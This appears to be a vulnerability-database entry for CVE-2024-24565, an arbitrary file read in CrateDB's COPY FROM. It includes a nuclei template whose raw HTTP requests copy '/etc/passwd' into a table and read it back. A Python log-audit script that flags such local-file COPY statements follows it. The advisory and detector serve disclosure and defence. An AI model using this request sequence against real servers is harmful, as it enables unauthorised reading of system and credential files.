History: Jun 18, 2024 - 9:47 a.m.

CrateDB Database - Arbitrary File Read

2024-06-18 09:47:38
ProjectDiscovery
github.com
cratedb
arbitrary file read
information leakage

CVSS3: 6.5 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

AI Score: 7 High (Confidence: Low)

EPSS: 0.052 Low (Percentile: 93.0%)

CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
id: CVE-2024-24565

info:
  name: CrateDB Database - Arbitrary File Read
  author: DhiyaneshDK
  severity: medium
  description: |
    CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-24565
    cwe-id: CWE-22
    epss-score: 0.0005
    epss-percentile: 0.18617
    cpe: cpe:2.3:a:cratedb:cratedb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cratedb
    product: cratedb
    fofa-query: title="CrateDB"
  tags: cve,cve2024,cratedb,lfi,exposure,intrusive

variables:
  table_name: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"}

      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"}

      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"SELECT * FROM {{table_name}} limit 100"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body_3)
          - "contains_all(header, 'application/json')"
          - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"
        condition: and
# digest: 4b0a00483046022100d8b2ec5081f12f4e249c8d56053734adb8094e605deee44cfa0f5b95400d0c53022100d7dea7c9abf3e11cfa4918875657aaa8a52942c0ca9c3bec58aec404ed905b2b:922c64590222798bb761d5b6d8e72950
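
A defender-side check for the behaviour described above, added here as an example and not part of the nuclei template or of CrateDB: it scans logged `/_sql` request bodies for `COPY ... FROM` statements that read a local path outside an approved import directory. The log record layout (`user`, `uri`, `body`), the `ALLOWED_IMPORT_DIR` policy and the treatment of scheme-less URIs as local files are assumptions.

```python
import json
import posixpath
import re

ALLOWED_IMPORT_DIR = "/data/import"  # hypothetical site policy

# COPY <table> ... FROM '<uri>'; '' is an escaped quote inside the literal.
COPY_FROM = re.compile(r"\s*COPY\b.+?\bFROM\s+'((?:[^']|'')*)'", re.I | re.S)
REMOTE_SCHEME = re.compile(r"(?!file:)[a-z][a-z0-9+.\-]*://", re.I)

def local_source(stmt):
    """Return the normalised local path a COPY FROM reads, else None."""
    m = COPY_FROM.match(stmt)
    if not m:
        return None
    uri = m.group(1).replace("''", "'")
    if REMOTE_SCHEME.match(uri):
        return None  # e.g. s3:// or https:// sources are not local reads
    path = re.sub(r"^file:(//)?", "", uri, flags=re.I)
    # Normalise so '..' segments cannot defeat the prefix check in audit().
    return posixpath.normpath(path)

def audit(log_lines):
    """Return (user, path) for COPY FROM reads outside ALLOWED_IMPORT_DIR."""
    findings = []
    for line in log_lines:
        try:
            record = json.loads(line)
            if not record["uri"].startswith("/_sql"):
                continue
            stmt = json.loads(record["body"])["stmt"]
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # not a parseable /_sql request
        path = local_source(stmt)
        if path and not path.startswith(ALLOWED_IMPORT_DIR + "/"):
            findings.append((record["user"], path))
    return findings

def _req(user, stmt):  # builds one constructed proxy-log line
    return json.dumps({"user": user, "uri": "/_sql?types",
                       "body": json.dumps({"stmt": stmt})})

SAMPLE_LOG = [  # constructed sample, not captured traffic
    _req("etl", "COPY metrics FROM 'file:///data/import/2024-06.csv'"),
    _req("etl", "COPY metrics FROM 's3://bucket/metrics.json'"),
    _req("report", "COPY tmp FROM '/etc/passwd' with (format='csv', header=false)"),
    _req("report", "SELECT * FROM tmp limit 100"),
    json.dumps({"user": "x", "uri": "/_sql", "body": "not json"}),
]
```

Running `audit(SAMPLE_LOG)` flags only the `report` user's read of `/etc/passwd`; the import-directory, remote-scheme, `SELECT` and malformed entries are ignored.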
